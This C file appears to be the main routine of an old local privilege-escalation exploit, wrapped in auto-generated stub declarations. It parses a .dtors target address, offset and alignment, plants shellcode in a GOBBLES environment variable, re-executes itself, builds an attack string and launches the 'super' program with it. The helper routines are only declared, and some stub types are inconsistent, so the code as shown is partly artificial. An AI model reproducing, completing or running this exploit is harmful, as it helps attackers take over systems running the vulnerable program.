
typedef unsigned long size_t;
typedef long intptr_t; typedef unsigned long uintptr_t;
typedef long scalar_t__;

typedef int bool;
 int ALLIGN ;
 int DPA ;
 char EOF ;
 char* SUPER ;
 int atoi (int ) ;
 int buildstring (unsigned long,unsigned long,int,int) ;
 int environ ;
 scalar_t__ execl (char*,char*,int ,int *) ;
 scalar_t__ execve (char*,char**,int ) ;
 int exit (int) ;
 int fprintf (int ,char*,...) ;
 char* getenv (char*) ;
 char getopt (int,char**,char*) ;
 int optarg ;
 int sscanf (int ,char*,char**) ;
 int stderr ;
 int string ;
 int strlen (char*) ;
 int stuff () ;

int
main(int argc, char **argv)
{
 unsigned long t, w;
 int dpa, allign, shift = 0;
 char c, *store;

 if(argc == 1) {
  fprintf(stderr, "\nUsage: \n%s -t <.dtors address> [ -o <offset> -A <allignment> ]\n", argv[0]);
  exit(0);
 }

 allign = ALLIGN;
 dpa = DPA;

 while((c = getopt(argc, argv, "t:o:A:")) != EOF) {
  switch(c) {
   case 't':
    sscanf(optarg, "%p", &store);
    t = (long)store;
     t += 4;
    break;
   case 'o':
    dpa = atoi(optarg);
    break;
   case 'A':
    allign = atoi(optarg);
    break;
   default:
    fprintf(stderr, "hehehe ;PPppPPPp\n");
    exit(0);
  }
 }

 store = ((void*)0);

 if((store = getenv("GOBBLES")) == ((void*)0)) {
  stuff();
  if(execve(argv[0], argv, environ)) {
   fprintf(stderr, ". problem re-executing\n");
   exit(1);
  }
 }

 w = (long)store;

 shift = (strlen(argv[0]) - strlen(SUPER));
 w += shift;

 fprintf(stderr, ". target @ %p\n. shellcode @ %p\n", t, w);

 buildstring(t, w, dpa, allign);

 if(execl(SUPER, "super", string, ((void*)0))) {
  fprintf(stderr, "error executing\n");
  exit(1);
 }
}
